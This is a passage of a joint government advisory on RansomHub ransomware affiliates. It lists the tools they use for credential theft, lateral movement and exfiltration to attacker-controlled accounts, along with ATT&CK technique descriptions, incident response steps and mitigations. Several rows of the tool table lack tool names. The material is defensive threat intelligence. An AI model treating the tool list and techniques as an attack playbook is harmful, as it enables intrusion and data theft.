Table 1: Tools Used by RansomHub Affiliates
Tool Name
Description
BITSAdmin
A command-line utility that manages downloads/uploads between a client and server by using the Background Intelligent Transfer Service (BITS) to perform asynchronous file transfers.
A penetration testing tool used by security professionals to test the security of networks and systems. RansomHub affiliates have used it to assist with lateral movement and file execution.
A tool that allows users to view and save authentication credentials such as Kerberos tickets. RansomHub affiliates have used it to aid privilege escalation.
A tool designed to run programs and execute commands on remote systems.
PowerShell
Cross-platform task automation solution made up of a command line shell, a scripting language, and a configuration management framework, which runs on Windows, Linux, and macOS.
RClone
A command line program used to sync files with cloud storage services.
Sliver
A penetration testing toolset which allows for remote command and control of systems.
SMBExec
A tool designed to manipulate SMB services for remote code execution.
WinSCP
Windows Secure Copy is a free and open source SSH File Transfer Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy protocol client. Affiliates have used it to transfer data from a compromised network to actor-controlled accounts.
CrackMapExec
Pentest Toolset
Kerberoast
Kerberos Brute force and Exploitation Tool
AngryIPScanner
Network Scanner
Indicators of Compromise
Disclaimer: Several of these IP addresses were first observed as early as 2020, although most date from 2022 or 2023 and have been historically linked to QakBot. The authoring organizations recommend organizations investigate or vet these IP addresses prior to taking action (such as blocking).
See Table 2–Table 5 for IOCs obtained from FBI investigations.
Disclaimer: The authoring organizations recommend network defenders investigate or vet IP addresses prior to taking action, such as blocking. Many cyber actors are known to change IP addresses, sometimes daily, and some IP addresses may host valid domains.
Table 3: Known IPs Related to Malicious Activity (2023-2024)
See Table 6–Table 17 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.
RansomHub affiliates may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system.
RansomHub affiliates may use Anydesk, a legitimate desktop support and remote access software to establish an interactive command and control channel to target systems within networks.
Table 16: Exfiltration
Technique Title
ID
Use
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
RansomHub affiliates may steal data by exfiltrating it over an asymmetrically encrypted network protocol other than that of the existing command and control channel.
RansomHub affiliates may exfiltrate data by transferring the data, including through sharing/syncing and creating backups of cloud environments, to another cloud account they control on the same service.
Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Unencrypted Non-C2 Protocol
RansomHub affiliates may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.
RansomHub ransomware deleted volume shadow copies and affiliates removed backups for ransomware operations.
Incident Response
If compromise is detected, organizations should:
Quarantine or take potentially affected hosts offline.
Reimage compromised hosts.
Provision new account credentials.
Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870). State, local, tribal, or territorial government entities can also report to the Multi-State Information Sharing and Analysis Center (MS-ISAC) (SOC@cisecurity.org or 866-787-4722).
Mitigations
Network Defenders
The authoring organizations recommend organizations implement the mitigations below to improve cybersecurity posture based on RansomHub’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.
Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
Refrain from requiring password changes more frequently than once per year. Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
Require administrator credentials to install software.
Keep all operating systems, software, and firmware up to date [CPG 1.E]. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems.
Require Phishing-Resistant multifactor authentication to administrator accounts [CPG 2.H] and require standard MFA for all services to the extent possible (particularly for webmail, virtual private networks, and accounts that access critical systems).
Segment networks [CPG 2.F] to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement.
Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool [CPG 3.A]. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host.
Install, regularly update, and enable real time detection for antivirussoftware on all hosts.
Implement Secure Logging Collection and Storage Practices [CPG 2.T].Learn more about logging best practices by referencing CISA’s Logging Made Easy resources.
Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.
Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege.
Disable unused ports.
Implement and enforce email security policies [CPG 2.M].
Consider adding an email banner to emails received from outside your organization.
Disable hyperlinks in received emails.
Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time (JIT) access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task.
Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.
Maintain offline backups of data, and regularly maintain backup and restoration [CPG 2.R]. By instituting this practice, the organization ensures they will not be severely interrupted, and/or only have irretrievable data.
Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization’s data infrastructure.
Software Manufacturers
The above mitigations apply to enterprises and critical infrastructure organizations with on-premises or hybrid environments. Recognizing that insecure software is the root cause of many of these flaws and that the responsibility should not be on the end user, CISA urges software manufacturers to implement the following to reduce the prevalence of identified or exploited issues (e.g., misconfigurations, weak passwords, and other weaknesses identified and exploited through the assessment team):
Embed security into product architecture throughout the entire software development lifecycle (SDLC).
Mandate MFA, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.
These mitigations align with tactics provided in the joint guide Shifting the Balance of Cybersecurity Risk: Principles and Approaches for Secure by Design Software. CISA urges software manufacturers to take ownership of improving the security outcomes of their customers by applying these and other secure by design tactics. By using secure by design tactics, software manufacturers can make their product lines secure “out of the box” without requiring customers to spend additional resources making configuration changes, purchasing security software and logs, monitoring, and making routine updates.
For more information on secure by design, see CISA’s Secure by Design webpage.
Validate Security Controls
In addition to applying mitigations, CISA recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring organizations recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.
To get started:
Select an ATT&CK technique described in this advisory (see Table 6–Table 17).
Align your security technologies against the technique.
Test your technologies against the technique.
Analyze your detection and prevention technologies’ performance.
Repeat the process for all security technologies to obtain a set of comprehensive performance data.
Tune your security program, including people, processes, and technologies, based on the data generated by this process.
CISA, FBI, MS-ISAC, and HHS recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.
Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws.
The FBI is interested in any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file.
Additional details of interest include a targeted company point of contact, status and scope of infection, estimated loss, operational impact, transaction IDs, date of infection, date detected, initial attack vector, and host- and network-based indicators.
The authoring organizations do not encourage paying a ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI’s Internet Crime Complain Center (IC3), a local FBI Field Office, or CISA via the agency’s Incident Reporting System or its 24/7 Operations Center (report@cisa.gov) or by calling 1-844-Say-CISA (1-844-729-2472).
Disclaimer
The information in this report is being provided “as is” for informational purposes only. The authoring organizations do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the authoring organizations.